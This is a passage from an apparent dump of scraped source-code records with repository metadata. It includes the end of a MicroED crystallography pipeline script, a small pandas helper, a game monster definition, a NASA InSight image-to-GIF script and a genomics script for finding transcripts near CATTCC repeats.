\"User entered arguments:\" + str(args)\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(print_this, args_dict['summary_logfile_name_w_abs_path'])\n\n\n ############### Check existence of elements in input mrc_file_or_smv_folder\n mrc_file_or_smv_folder_opened = codecs.open(list_of_mrc_file_or_smv_folder_w_abs_path, 'r')\n for mrc_file in mrc_file_or_smv_folder_opened:\n if (mrc_file == \"\\n\") or (mrc_file == \"\"):\n continue\n \n mrc_w_path = mrc_file.rstrip()\n \n if (os.path.exists(mrc_w_path) == False):\n print_this = str(mrc_w_path) + \" doesn't exist. 
Please fix file name/path.\\n\"\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n exit(1)\n mrc_file_or_smv_folder_opened.close()\n ############### Check existence of elements in input mrc_file_or_smv_folder\n\n\n ############### Identify whether input mrc_file_or_smv_folder is for mrc/smv\n mrc_file_or_smv_folder_opened = codecs.open(list_of_mrc_file_or_smv_folder_w_abs_path, 'r')\n input_list_has_mrc = False\n for mrc_file in mrc_file_or_smv_folder_opened:\n if (\".mrc\" in mrc_file):\n input_list_has_mrc = True\n break\n mrc_file_or_smv_folder_opened.close()\n args_dict['input_list_has_mrc'] = input_list_has_mrc\n ############### Identify whether input mrc_file_or_smv_folder is for mrc/smv\n \n\n ############### count columns, NX, NY, sections of the FIRST input mrc \n if (args_dict['input_list_has_mrc'] == True):\n mrc_file_list_opened = codecs.open(list_of_mrc_file_or_smv_folder_w_abs_path, 'r')\n for mrc_file in mrc_file_list_opened:\n if \".mrc\" in mrc_file:\n mrc_w_path = mrc_file.rstrip()\n columns, sections = count_columns_sections_in_each_mrc_file_by_mrcfile(args_dict, mrc_w_path)\n if (columns == None) or (columns == False):\n print_this = \"columns of mrc is either None or False. Is this mrc input file correct?\"\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(print_this, args_dict['summary_logfile_name_w_abs_path'])\n exit(1)\n args_dict['columns'] = columns\n args_dict['NX'] = args_dict['columns']\n args_dict['NY'] = args_dict['columns']\n args_dict['sections'] = sections\n break\n else: # user provided .mrcs file\n break\n mrc_file_list_opened.close()\n\n else: # if (args_dict['input_list_has_mrc'] = False # so user's file is smv/img\n pass\n #args_dict['sections'] = 1\n # Doo Nam and Sam believe that smv/img file are for single image never stacks as mrcs\n\n '''\n # check whether a user specified ORGX, ORGY\n if (\"ORGX\" not in args_dict) or (\"ORGY\" not in args_dict):\n ORGX_specified = False\n for key, value in args_dict.items():\n ##print (fkey:{key}\")\n ##print (flen(key):{len(key)}\")\n if (len(key) == 2):\n if (\"ORGX\" in key[0]):\n ORGX_specified = True\n break\n if (ORGX_specified == False):\n print_this = \"ORGX and ORGY should be specified manually when a user provides smv only (not mrc).\"\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(print_this, args_dict['summary_logfile_name_w_abs_path'])\n exit(1)\n # check whether a user specified ORGX, ORGY\n '''\n ############### count columns, NX, NY, sections of the FIRST input mrc\n\n\n\n ############### check xds_par, xscale, xdsconv path\n try:\n path = subprocess.check_output([\"which\", \"xds_par\"]).decode('UTF-8')\n print_this = \"xds_par is located by PATH. 
The path of xds_par:\" + str(path)\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n except:\n print_this =\"AutoMicroED can't find xds_par in user's PATH.\"\n print_this = print_this + \"\\nPlease add xds_par folder to PATH and run AutoMicroED again because same PATH has forkxds as well.\"\n # devel comment: because of forkxds, do not use xds_folder argument, mandate users to set PATH\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n \n write_this = '''For example,\n emacs ~/.bash_profile\n \n (copy and paste this to any line)\n export PATH=\"/gpustorage/DN/XDS-INTEL64_Linux_x86_64\":$PATH \n \n (save, for mac keyboard Ctrl-x-s)\n \n (exit emacs, for mac keyboard Ctrl-x-c)\n \n source ~/.bash_profile (or opening a new tab to take effect of new change in ~/.bash_profile'''\n\n #export PATH=\"/gpustorage/DN/XDS-INTEL64_Linux_x86_64\":$PATH # for PNNL_Krios_GPU.\n #export PATH=\"/home/kimd999/bin/XDS-INTEL64_Linux_x86_64\":$PATH # for PNNL_HPC_Cascade.\n\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n exit(1)\n ################ check xds_par, xscale, xdsconv path\n \n \n \n ################ check cad, f2mtz, shelxt, shelxl path\n try:\n subprocess.check_output([\"which\", \"shelxt\"])\n except:\n if ('ccp4_folder' not in args_dict.keys()):\n print_this =\"AutoMicroED can't find shelxt in user's PATH.\"\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n \n print_this =\"Solution #1. Add shelxt folder to ~/.bashrc PATH and run AutoMicroED again. \\n\"\n print_this = print_this + '''For example,\n emacs ~/.bash_profile\n \n (copy and paste this to any line)\n export PATH=\"/home/kimd999/bin/ccp4/ccp4-7.1/bin\":$PATH \n \n (save by Ctrl-x-s for mac keyboard)\n (exit emacs by Ctrl-x-c for mac keyboard)\n \n source ~/.bash_profile (or opening a new tab to take effect of new change in ~/.bash_profile'''\n\n #export PATH=\"/home/kimd999/bin/ccp4/ccp4-7.1/bin\":$PATH # for PNNL_Krios_GPU.\n #export PATH=\"/msc/krios/bin\":$PATH # for PNNL_HPC_cascade.\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n \n \n print_this =\"Solution #2. Add ccp4_folder (that has cad, f2mtz, shelxt, shelxl) to user's args_file and run AutoMicroED again. \\n\"\n print_this = print_this + '''For example,\n emacs args_file.txt\n \n (copy and paste this to any line)\n ccp4_folder /home/kimd999/bin/ccp4/ccp4-7.1/bin\n \n (save by Ctrl-x-s for mac keyboard)\n (exit emacs by Ctrl-x-c for mac keyboard)\n '''\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n \n exit(1)\n ################ check cad, f2mtz, shelxt, shelxl path\n \n process = \" Automatic MicroED\"\n show_header(process)\n start_time = time.time()\n \n path_before_opening_list_of_mrc_file_or_smv_folder = os.getcwd()\n\n if (args_dict['input_list_has_mrc'] == True):\n if (\n ('Bypass_movie_inspection' not in args_dict.keys()) \n or (args_dict['Bypass_movie_inspection'].upper() == \"F\")\n or (args_dict['Bypass_movie_inspection'].upper() == \"FALSE\")\n ):\n check_movie_quality()\n\n ############### args_dict['sections']) > 1 (e.g. 
mrcs input)\n if (int(args_dict['sections']) > 1): \n\n mrc_file_list_opened = codecs.open(list_of_mrc_file_or_smv_folder_w_abs_path, 'r')\n mrc_file_number = 0\n for mrc_file in mrc_file_list_opened:\n mrc_w_path = mrc_file.rstrip()\n #write_this = \"mrc_file:\" + str(mrc_file)\n #flog_wo_print(write_this, args_dict['logfile_name_w_abs_path'])\n \n if (mrc_file == \"\\n\") or (mrc_file == \"\"):\n continue\n \n mrc_file_number = mrc_file_number + 1\n if (platform.system() == \"Linux\"):\n \n mrc_file_basename = os.path.basename(mrc_file)\n intermediate_output_folder_name = os.path.splitext(mrc_file_basename)[0]\n \n os.mkdir(intermediate_output_folder_name)\n os.chdir(intermediate_output_folder_name)\n os.mkdir(\"xds\")\n os.mkdir(\"img\")\n os.chdir(\"img\")\n \n per_each_mrc_smv_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n\n more_crystal_needed = xds_retrieve_UNIT_CELL_per_each_mrc_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n \n if (more_crystal_needed == \"failed\"):\n exit(1)\n elif (more_crystal_needed == \"CORRECT.LP not found\"):\n write_this = \"[xds] CORRECT.LP not found even after many troubleshootings.\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n else:\n write_this = \"more_crystal_needed: \" + str(more_crystal_needed)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n \n if (more_crystal_needed == True):\n write_this = \"AutoMicroED will feed more mrcs file (if any).\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n \n os.chdir(path_before_opening_list_of_mrc_file_or_smv_folder)\n \n if (more_crystal_needed == False):\n break\n \n else: # macOS\n mrc_file_basename = os.path.basename(mrc_file)\n write_this = \"mrc_file_basename:\" + str(mrc_file_basename)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n \n intermediate_output_folder_name = os.path.splitext(mrc_file_basename)[0]\n \n os.mkdir(intermediate_output_folder_name)\n os.chdir(intermediate_output_folder_name)\n \n os.mkdir(\"xds\")\n \n os.mkdir(\"img\")\n os.chdir(\"img\")\n \n per_each_mrc_smv_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n\n more_crystal_needed = xds_retrieve_UNIT_CELL_per_each_mrc_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n write_this = \"more_crystal_needed: \" + str(more_crystal_needed)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n \n if (more_crystal_needed == -999):\n exit(1)\n \n os.chdir(path_before_opening_list_of_mrc_file_or_smv_folder)\n if (more_crystal_needed == False):\n break\n mrc_file_list_opened.close()\n ######### end of for mrc_file in mrc_file_or_smv_folder_opened\n \n if (mrc_file_number == 0):\n write_this = \"mrc_file_number = 0. Please populate mrc_list first.\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n exit(1)\n \n if (more_crystal_needed != \"no CORRECT.LP found\"):\n write_this = \"more_crystal_needed after looping through list_of_mrc_file_or_smv_folder: \" + str(more_crystal_needed)\n args_dict['more_crystal_needed'] = more_crystal_needed\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n else:\n print_this = \"xds needs to be re-ran with other approach/data. 
Please analyze xds_XXX.log files.\\n\"\n print_this = print_this + \"For example, xds binary might have been expired like \\\"Sorry, license expired on 31-Mar-2022\\\"\"\n \n print (print_this)\n exit(1)\n ############### args_dict['sections']) > 1 (e.g. mrcs input)\n\n\n ############### single frame mrc (e.g. individual mrc)\n else: # (args_dict['sections']) == 1)\n mrc_file_number = 0\n mrc_file_or_smv_folder_opened = codecs.open(list_of_mrc_file_or_smv_folder_w_abs_path, 'r')\n \n more_crystal_needed = None\n for mrc_file in mrc_file_or_smv_folder_opened:\n mrc_w_path = mrc_file.rstrip()\n \n if (mrc_file == \"\\n\") or (mrc_file == \"\"):\n continue\n \n if (mrc_w_path.find('.mrc') == -1):\n print_this = str(mrc_w_path) + \" doesn't have .mrc.\\nPerhaps, a user entered args_file rather than mrc.list?\\n\"\n print_this = print_this + \" AutoMicroED exits now.\\n\"\n print (print_this)\n end_time = time.time()\n \n write_this = show_time(process, start_time, end_time)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n exit(1)\n \n if (os.path.isfile(mrc_w_path) == False):\n print_this = str(mrc_w_path) + \" doesn't exist. AutoMicroED exits now.\\n\"\n print (print_this)\n end_time = time.time()\n \n write_this = show_time(process, start_time, end_time)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n exit(1)\n \n mrc_file_number = mrc_file_number + 1\n \n base_mrc_name = os.path.basename(mrc_w_path)\n splited_base_mrc_name = base_mrc_name.split(\".mrc\")\n splited_base_mrc_name2 = splited_base_mrc_name[0].split(\"_\")\n image_num = int(splited_base_mrc_name2[len(splited_base_mrc_name2)-1])\n \n if (image_num <= 3): # Irina doesn't like to use first 3 images\n continue\n \n mrc_file_basename = os.path.basename(mrc_w_path)\n intermediate_output_folder_name = mrc_file_basename[:-9]\n \n # (Note) because of this, single frame mrc_file can be processed similarly as multi frame mrc_file\n if (os.path.isdir(intermediate_output_folder_name) == False):\n os.mkdir(intermediate_output_folder_name)\n os.chdir(intermediate_output_folder_name)\n print (os.getcwd())\n \n if (os.path.isdir(\"xds\") == False):\n os.mkdir(\"xds\")\n \n if (os.path.isdir(\"img\") == False):\n os.mkdir(\"img\")\n os.chdir(\"img\")\n \n \n print_this = \"(single column) mrc file that is used for xds_retrieve_UNIT_CELL_per_each_mrc_file_both_single_and_multiple_sections:\" + str(mrc_w_path)\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n \n per_each_mrc_smv_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n\n more_crystal_needed = xds_retrieve_UNIT_CELL_per_each_mrc_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n\n if (more_crystal_needed == \"no CORRECT.LP found\"):\n flog(\"no CORRECT.LP found\", args_dict['logfile_name_w_abs_path'])\n elif (more_crystal_needed == \"Running xds failed.\"):\n flog(\"Running xds failed. 
Please analyze xds.log files.\", args_dict['logfile_name_w_abs_path'])\n exit(1)\n else:\n write_this = \"more_crystal_needed: \" + str(more_crystal_needed)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n \n if (more_crystal_needed == True):\n write_this = \"AutoMicroED will feed more individual mrc (column=1) file (if there are any).\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n\n if (more_crystal_needed == -999):\n exit(1)\n \n os.chdir(path_before_opening_list_of_mrc_file_or_smv_folder)\n if (more_crystal_needed == False):\n break\n \n mrc_file_or_smv_folder_opened.close()\n \n if (mrc_file_number == 0):\n write_this = \"mrc_file_number = 0. Please populate mrc_list first.\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n exit(1)\n \n if more_crystal_needed == None:\n print (\"more_crystal_needed is not defined. Maybe xds_retrieve_UNIT_CELL_per_each_mrc_file_both_single_and_multiple_sections never ran since # of each mrc < 4\")\n exit(1)\n\n args_dict['more_crystal_needed'] = more_crystal_needed\n if (more_crystal_needed != \"no CORRECT.LP found\"):\n write_this = \"more_crystal_needed after looping through list_of_mrc_file_or_smv_folder: \" + str(more_crystal_needed)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n else:\n print_this = \"xds needs to be re-ran with other approach/data.\"\n print (print_this)\n exit(1)\n ############### single frame mrc (e.g. individual mrc)\n \n\n else: # input_list_has_mrc == False (such as smv/img file)\n smv_folder_opened = codecs.open(list_of_mrc_file_or_smv_folder_w_abs_path, 'r')\n for each_smv_folder in smv_folder_opened:\n each_smv_folder = each_smv_folder.rstrip()\n\n write_this = \"each_smv_folder:\" + str(each_smv_folder)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n #/gpustorage/MicroEDProc/SMP/CycA_SBGrid/752/20181220-112002/img/\n\n if (each_smv_folder == \"\\n\") or (each_smv_folder == \"\"):\n continue\n\n for each_img_file in os.listdir(each_smv_folder):\n if each_img_file.endswith(\".img\") or each_img_file.endswith(\".smv\"):\n prefix_of_img_file = each_img_file[:len(each_img_file)-9]\n args_dict['prefix_of_img_file'] = prefix_of_img_file\n break\n\n if (each_smv_folder[len(each_smv_folder)-1]) == \"/\":\n each_smv_folder = each_smv_folder[:len(each_smv_folder)-1]\n\n intermediate_output_folder_name = each_smv_folder.split('/')[-2]\n #print (fintermediate_output_folder_name:{intermediate_output_folder_name}\")\n # smv only -> 165749merged\n \n os.mkdir(intermediate_output_folder_name)\n os.chdir(intermediate_output_folder_name)\n \n os.mkdir(\"xds\")\n os.mkdir(\"img\")\n os.chdir(\"img\")\n\n command = \"cp \" + str(each_smv_folder).rstrip() + \"/*.img .\"\n print(command)\n os.system(command)\n\n per_each_mrc_smv_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n\n more_crystal_needed = xds_retrieve_UNIT_CELL_per_each_mrc_file_both_single_and_multiple_sections(args_dict, \n mrc_w_path, \n intermediate_output_folder_name)\n if (more_crystal_needed == \"failed\"):\n exit(1)\n elif (more_crystal_needed == \"CORRECT.LP not found\"):\n write_this = \"[xds] CORRECT.LP not found even after many troubleshootings.\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n exit(1)\n elif (more_crystal_needed == \"Running xds failed.\"):\n flog(\"Running xds failed. 
Please analyze xds.log files.\", args_dict['logfile_name_w_abs_path'])\n exit(1)\n else:\n write_this = \"more_crystal_needed: \" + str(more_crystal_needed)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n \n if (more_crystal_needed == True):\n write_this = \"AutoMicroED will feed more smv/img file (if there are any).\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n \n os.chdir(path_before_opening_list_of_mrc_file_or_smv_folder)\n \n if (more_crystal_needed == False):\n break\n\n smv_folder_opened.close()\n #### end of for each_smv_folder in smv_folder_opened:\n\n if (more_crystal_needed != \"no CORRECT.LP found\"):\n write_this = \"bool(more_crystal_needed) after looping through list_of_mrc_file_or_smv_folder: \" + str(more_crystal_needed)\n args_dict['more_crystal_needed'] = more_crystal_needed\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n else:\n print_this = \"xds needs to be re-ran with other approach/data.\"\n print (print_this)\n exit(1)\n ####end of else: # input_list_has_mrc == False (such as smv and img file)\n\n\n\n ###### Common for stack and single frame mrc \n # (after xds_retrieve_UNIT_CELL_per_each_mrc_file_both_single_and_multiple_sections)\n\n returned_from_generate_each_SPACE_GROUP_folder = generate_each_SPACE_GROUP_folder(args_dict)\n if (returned_from_generate_each_SPACE_GROUP_folder == False):\n end_time = time.time()\n \n write_this = show_time(process, start_time, end_time)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n\n\n\n\n if (\"outdir\" not in args_dict):\n print_this = \"\\noutdir is not defined in args_file\\n\"\n print_this = print_this + \"Either specify it args_file (for later AutoMicroED run)\\n\"\n print_this = print_this + \"or enter here (for example full_range_xds).\"\n print_this = print_this + \"\\n\\tRefer (git repo)/templates/args_file/explanation_of_args.txt for an example of outdir\"\n print (print_this)\n\n\n #Thread(target = wait_10_seconds).start()\n answer = receive_from_user(\"outdir\") \n if answer != None:\n args_dict['outdir'] = answer\n working_folder = args_dict['outdir'] + \"_\" + working_folder\n\n else:\n working_folder = args_dict['outdir'] + \"_\" + working_folder\n\n # common regardless whether user specified outdir or not\n os.chdir(\"..\")\n new_working_folder_abs_path = os.path.abspath(working_folder)\n\n command = \"mv \" + str(working_folder_abs_path) + \" \" + str(new_working_folder_abs_path)\n os.system(command)\n\n\n\n\n exit(1)\n \n dir_before_entering_each_SPACE_GROUP = os.getcwd()\n for SPACE_GROUP_folder in glob.glob(\"SPACE_GROUP_*\"):\n print_this = \"SPACE_GROUP_folder:\" + str(SPACE_GROUP_folder)\n flog(print_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(print_this, args_dict['summary_logfile_name_w_abs_path'])\n\n os.chdir(SPACE_GROUP_folder)\n \n generate_each_similar_UNIT_CELL_folder(args_dict)\n \n dir_per_SPACE_GROUP = os.getcwd()\n print (\"directory per_SPACE_GROUP:\" + str(dir_per_SPACE_GROUP))\n \n for entry in os.scandir('.'):\n if not entry.name.startswith('.') and entry.is_dir():\n cwd = os.getcwd()\n print (\"cwd:\" + str(cwd))\n os.chdir(entry.name)\n \n return_from_run_xscale_to_merge = xscale.run_xscale_to_merge(args_dict) \n # just \"merge\" even if current_completeness <= target\n if (return_from_run_xscale_to_merge == False):\n exit(1)\n \n result_of_phasing = phasing(args_dict) # phasing seems to be needed to be ran per each UNIT_CELL folder\n if 
(result_of_phasing == False):\n write_this = \"\\t\\tPhasing was not successful.\\n\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n\n end_time = time.time()\n \n write_this = show_time(process, start_time, end_time)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n\n exit(1)\n else:\n write_this = \"\\t\\tPhasing was successful.\\n\"\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n\n \n if ((str(args_dict['protein']).upper() == \"TRUE\") \\\n or (str(args_dict['protein']).upper() == \"T\")):\n return_from_phenix_refine_fn = protein.phenix_refine_fn(args_dict)\n \n os.chdir(dir_per_SPACE_GROUP)\n \n os.chdir(dir_before_entering_each_SPACE_GROUP)\n\n \n closing_remark(args_dict)\n end_time = time.time()\n \n write_this = show_time(process, start_time, end_time)\n flog(write_this, args_dict['logfile_name_w_abs_path'])\n flog_wo_print(write_this, args_dict['summary_logfile_name_w_abs_path'])\n ###### Common for stack and single frame mrc\n \n\n ###### final organization\n os.chdir(working_folder_abs_path)\n \n os.mkdir(\"archive\")\n \n\n command = \"cp \" + str(args_dict['args_file_w_abs_path']) + \" archive/user_specified_args_file.txt\"\n os.system(command)\n\n command = \"cp \" + str(list_of_mrc_file_or_smv_folder_w_abs_path) + \" archive/user_entered_mrc_list.txt\"\n os.system(command)\n\n all_folders = os.listdir()\n for folder in all_folders:\n if \"archive\" in folder:\n pass\n elif \"SPACE_\" in folder:\n pass\n elif \"summary.log\" in folder:\n pass\n else:\n command = \"mv \" + str(folder) + \" archive\"\n os.system(command)\n \n command = \"mv archive/user_* .\"\n os.system(command)\n ###### final organization\n\n\n if (\"outdir\" not in args_dict):\n print_this = \"\\noutdir is not defined in args_file\\n\"\n print_this = print_this + \"Either specify it args_file (for later AutoMicroED run)\\n\"\n print_this = print_this + \"or enter here (for example full_range_xds).\"\n print_this = print_this + \"\\n\\tRefer (git repo)/templates/args_file/explanation_of_args.txt for an example of outdir\"\n print (print_this)\n\n\n #Thread(target = wait_10_seconds).start()\n answer = receive_from_user(\"outdir\") \n if answer != None:\n args_dict['outdir'] = answer\n working_folder = args_dict['outdir'] + \"_\" + working_folder\n\n else:\n working_folder = args_dict['outdir'] + \"_\" + working_folder\n\n # common regardless whether user specified outdir or not\n os.chdir(\"..\")\n new_working_folder_abs_path = os.path.abspath(working_folder)\n\n command = \"mv \" + str(working_folder_abs_path) + \" \" + str(new_working_folder_abs_path)\n os.system(command)\n","repo_name":"pnnl/AutoMicroED","sub_path":"run_all.py","file_name":"run_all.py","file_ext":"py","file_size_in_byte":31019,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"18"} +{"seq_id":"450413877","text":"from pathlib import Path\n\nimport pandas as pd\n\n\nclass Overview:\n def __init__(self, overview):\n if type(overview) == str:\n self.overview = pd.read_csv(Path(overview))\n elif type(overview) == pd.DataFrame:\n self.overview = overview\n else:\n raise TypeError(f'Should be dataframe like object, received {type(overview)}')\n\n def __getitem__(self, args):\n if len(args) == 2:\n ngt_id, speaker_id = args\n else:\n raise 
ValueError(f'Invalid number of arguments: {len(args)} (should be 2)')\n\n return Path(self.overview.loc[\n (self.overview['session_id'] == ngt_id) & (self.overview['speaker_id'] == speaker_id),\n 'media_path'\n ].iloc[0])\n","repo_name":"Casvanrijbroek/Sign-Language-Thesis","sub_path":"utils/overview.py","file_name":"overview.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73198616361","text":"cockroach = genMonster(\"Cockroach\", (284, 8593), \"a cockroach\")\ncockroach.setTargetChance(0)\ncockroach.bloodType(\"slime\")\ncockroach.setHealth(1)\ncockroach.setExperience(0)\ncockroach.setSpeed(200) #incorrect\ncockroach.walkAround(1,1,1) # energy, fire, poison\ncockroach.setBehavior(summonable=200, hostile=0, illusionable=1, convinceable=200, pushable=1, pushItems=0, pushCreatures=0, targetDistance=0, runOnHealth=1)\ncockroach.setImmunity(0,0,0) # paralyze, invisible, lifedrain\ncockroach.setDefense(0, fire=1.0, earth=1.0, energy=1.0, ice=1.0, holy=1.0, death=1.0, physical=1.0, drown=1.0)\ncockroach.loot( (\"cockroach leg\", 100.0) )","repo_name":"novasdream/PyOT","sub_path":"data/monsters/Arthropods/Insects/Cockroach.py","file_name":"Cockroach.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"7687369466","text":"### Gets X number of images from InSight Mars Lander from NASA.gov\n\n### Args:\n### n = number of images starting from the current one backwards\n### out = output directory\n\nimport argparse\nimport subprocess\nimport os\nimport signal\nimport time\nimport shutil\nfrom insightmars import InSightAPI, utils\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--fps', \"-f\", help='GIF speed', required=True)\nparser.add_argument('--output', \"-o\", help='Output gif name', required=True)\nparser.add_argument('--size', \"-s\", help='Output gif size (WxH)')\nparser.add_argument('--camera', \"-c\", help='Camera: icc / idc', default=\"idc\")\nparser.add_argument('--textsize', \"-t\", help='Text size: default 40', default=\"40\")\nargs = parser.parse_args()\nInSightMission = InSightAPI(af=args.camera, per_page=\"400\")\njson_request = InSightMission.make_request()\nmetadata_images = InSightMission.get_images_metadata(json_request, InSightMission.get_count(json_request))\nimages = []\nmetadata = []\nfilenames = []\nfor index, image in enumerate(metadata_images):\n\timages.append(image[\"url\"])\n\tmetadata.append(image[\"title\"])\n\tfilenames.append(\"images/IMG_\" + str(index) + \".png\")\n\nmetadata.reverse()\nif os.path.exists(\"images\"):\n\tshutil.rmtree(\"images\")\nutils.download_image(images, \"images/\", order=\"sequential\")\nfor index, i in enumerate(filenames):\n\tcmd = [\"convert\",i,\"-pointsize\",args.textsize,\"-fill\",\"white\",\"-undercolor\",\"'#00000080'\",\"-gravity\",\"South\",\"-annotate\",\"+0+5\",metadata[index],i]\t\n\tp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\tout, err = p.communicate()\n \nscale = \"\"\nif not args.size == None:\n\tscale = \"-vf scale=\" + args.size\np = subprocess.Popen(\"ffmpeg -y -f image2 -framerate \" + args.fps + \" -i images/IMG_%d.png \" + scale + \" \" + args.output, shell=True)\nout, err = p.communicate()\n\n#shutil.rmtree(\"images\")\n","repo_name":"KonradIT/insight-api","sub_path":"insight_make_gif_metadata.py","file_name":"insight_make_gif_metadata.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"18"} +{"seq_id":"75267584039","text":"# Find genetic elements nearby CATTCC repeat clusters.\n\nimport os, pysam, math, sys, tqdm\nimport pandas as pd\ncurrentdir = os.path.dirname(os.path.realpath(__file__))\nparentdir = os.path.dirname(currentdir)\nsys.path.append(parentdir)\nfrom gen import gen\nimport plotting\n\nfrom utilities import extract_matching_strings, load_repeat_masker_data, get_fasta_faidx, generate_rna_dataframe\nfrom utilities import nearest_distance, filter_pandas, filter_similar_transcripts\nfrom utilities import load_bin_bam\n\n# Define file system.\ngenomes_dir ='/media/ngs/data/genomes/chm13_v1.0/'\n#genomes_dir ='/Users/franklin/Dropbox/TEAD_paper/data/genomics/chm13_v1.0/'\ngenome_fa = 'chm13.draft_v1.0.fasta'\ngenome = gen(genomes_dir, genome_fa)\n\n# Add repeat bin file.\ngenome.add_field('binned_repeats','binned_CATTCC.bed')\n\n# Add rna mapped to genome.\ngenome.add_field('rna','RNA_aligned.bam')\n\n# maximum distance between end of repeat and beginning of transcript:\nmax_distance=10**6\n\n# Filter binned data base on simple threshold. Counts/ kb.\nmotif_threshold = 15\nrepeat_data = load_bin_bam(genomes_dir+genome.binned_repeats)\nrepeat_data = filter_pandas(repeat_data, count=[2, math.inf])\nplotting.histplot(repeat_data['count'].values,'TEAD motifs/2kb', bin_count=150)\n\n# Looking at histograms of the data, there's basically three densities of TEAD motifs. Very low, and two high. Let's look\n# at data in each of these density ranges.\nlow_density=[0,70]\nmed_density=[70,150]\nhi_density =[150,math.inf]\n\n# Make a new column for classification.\nrepeat_data['class']=''\n# Label data by class.\nlow_data = (repeat_data['count'] > low_density[0]) & (repeat_data['count'] <= low_density[1])\nrepeat_data.loc[low_data,'class']='low'\nmed_data = (repeat_data['count'] > med_density[0]) & (repeat_data['count'] <= med_density[1])\nrepeat_data.loc[med_data,'class']='medium'\nhigh_data = (repeat_data['count'] > hi_density[0]) & (repeat_data['count'] <= hi_density[1])\nrepeat_data.loc[high_data,'class']='high'\n\n# Histogram by chromosome?\nplotting.histplot(repeat_data.loc[repeat_data['class'] == 'high', 'contig'], 'contig', title='high', label_rotation=45)\n\n# load genome.\nfasta = get_fasta_faidx( genome.base_dir+genome.genome_fa )\n# load aligned rna bam. **make sure to create bam file index: \"samtools index **.bam\"\nrna_bam = pysam.AlignmentFile(genome.base_dir+genome.rna)\n\n#Create a dataframe for total output.\ncolumn_names = ['contig','ref_start','ref_end','repeat_type','motif_counts','transcript_name', 'start_position', 'length', \\\n 'distance_to_repeat', 'gene_loc']\nL=list()\n\n# Loop over repeatmasker entries that match the sat3 repeats, get their center location in the assembly.
Find the closest transcript(s).\nfor index, rep_row in tqdm(repeat_data.iterrows()):\n sat_start=rep_row['start']\n sat_end = rep_row['stop']\n # Search for RNAs within 'max_distance'.\n rna_search_range = [max(sat_start - max_distance, 0), min(sat_end + max_distance, fasta.get_reference_length(rep_row['contig']))]\n rna_matches = rna_bam.fetch(reference=rep_row['contig'], start=rna_search_range[0], end=rna_search_range[1])\n\n # iterate over reads, append to matches dataframe\n mini_list=list()\n positions=list()\n for read in rna_matches:\n distance2repeat, gene_loc = nearest_distance( [sat_start, sat_end], [read.reference_start, read.reference_end])\n mini_list.append([rep_row['contig'], rep_row['start'], rep_row['stop'], rep_row['class'], rep_row['count'], read.query_name, read.reference_start, read.query_length, distance2repeat, gene_loc])\n # keep track of positions for filtering out later.\n positions.append(read.positions)\n\n # Keep all matches.\n L.extend(mini_list)\n\n# Convert list to df.\nDATA=pd.DataFrame(L,columns=column_names)\n# Save DATA to file.\nDATA.to_csv(genome.base_dir+'/all_matches_'+str(max_distance)+'.dat', sep='\\t', index=False)\n\n# Test reading/fetching from sam 